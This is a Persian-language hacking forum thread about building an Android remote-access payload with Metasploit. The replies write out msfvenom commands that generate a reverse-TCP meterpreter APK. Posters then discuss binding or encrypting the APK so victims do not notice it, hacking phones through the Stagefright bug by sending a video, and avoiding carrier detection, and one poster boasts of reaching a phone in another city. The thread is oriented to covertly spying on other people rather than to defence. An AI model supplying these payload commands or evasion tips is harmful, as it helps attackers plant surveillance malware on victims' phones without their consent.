discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

سلام

من تزمینالو باز میکنم  این دستورو میزنم ارور میده

میشه بگید مشکل از کجاس؟

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=80 R > tset.apk

به اشتراک گذاری این ارسال

لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلام

میشه بگید مشکل از کجاس؟

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=80 R > tset.apk

اگه از کالی 2 استفاده میکنید به احتمال زیاد مشکل از متاسپلویتتونه چون توی کالی 2 یکم مشکل داره اروری که میده رو قرار بده تا اگه لازم بود آموزش درست کردنش رو بذارم ...

لینک به ارسال

سلام

میشه بگید مشکل از کجاس؟

دوست عزیز سلام

الان چند وقتی هست که این روش منسوخ شده و به جای msf payload باید از روش msfvenom استفاده کنید.

از دوستان خواهش مندم روش venom رو آموزش بدن.

msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/esme barnameh.apk

مشکلی که با با این روش هست اینه که نمیتونید به گوشی کسی که از وای فای یا شبکه شما خارجه  دسترسی بگیرید.

به نظر بنده رات ها بهترند البته مشکل اصلی با رات و این روش این هست که نمیشه برنامه apk ساخته شده رو طوری بایند کرد که کسی متوجه نشه.

لینک به ارسال

دوست عزیز سلام

الان چند وقتی هست که این روش منسوخ شده و به جای msf payload باید از روش msfvenom استفاده کنید.

msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/esme barnameh.apk

مشکلی که با با این روش هست اینه که نمیتونید به گوشی کسی که از وای فای یا شبکه شما خارجه  دسترسی بگیرید.

به نظر بنده رات ها بهترند البته مشکل اصلی با رات و این روش این هست که نمیشه برنامه apk ساخته شده رو طوری بایند کرد که کسی متوجه نشه.

بله من از کالی ۲ استفاده میکنم

فایلو با این روش ساختم مرسی

ولی من اگه بخوام روی گوشی خودم تستش کنم و خارج از شبکه وایفای باشه جواب نمیده؟

الان با این فایل میتونم چیکار کنم؟

لینک به ارسال

بله من از کالی ۲ استفاده میکنم

فایلو با این روش ساختم مرسی

ولی من اگه بخوام روی گوشی خودم تستش کنم و خارج از شبکه وایفای باشه جواب نمیده؟

الان با این فایل میتونم چیکار کنم؟

سلام

از باگ stagefright استفاده کنید

تو سایتای خارجی بگردی پیدا میکنی

فقط با دادن ی فیلم میتونی هکش کنی

لینک به ارسال

با ارسال mms شبکه های مخابراتی هم راحت میتونستن کنترل کنند و بفهمن که فایل شما مخرب هست و میخواید جاسوسی گوشی انجام بدید
این درسته؟

آموزش فارسیشو نداره این انجمن؟

لینک به ارسال

دوست عزیز سلام

سلام

شما گفتید که مشکل این روش اینه که نمیشه به گوشی کسی که از وای فای یا شبکه شما خارجه دسترسی بگیرید ولی من کاملا این حرف شما رو رد میکنم

چون خود من تونستم دسترسی بگیریم با کسی که خارج از شبکه وای فای و در شهر دیگه ای هستش :)

تنها مشکلی که هست اینه که نمیشه فایل apk ساخته شده رو بایند کرد یا کریپتش کرد ... (البته برای مخفی کردن کد توی یه برنامه دیگه یه راهی هست که اموزش هاش محدوده که خود من هم متوجه نشدم)

لینک به ارسال

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری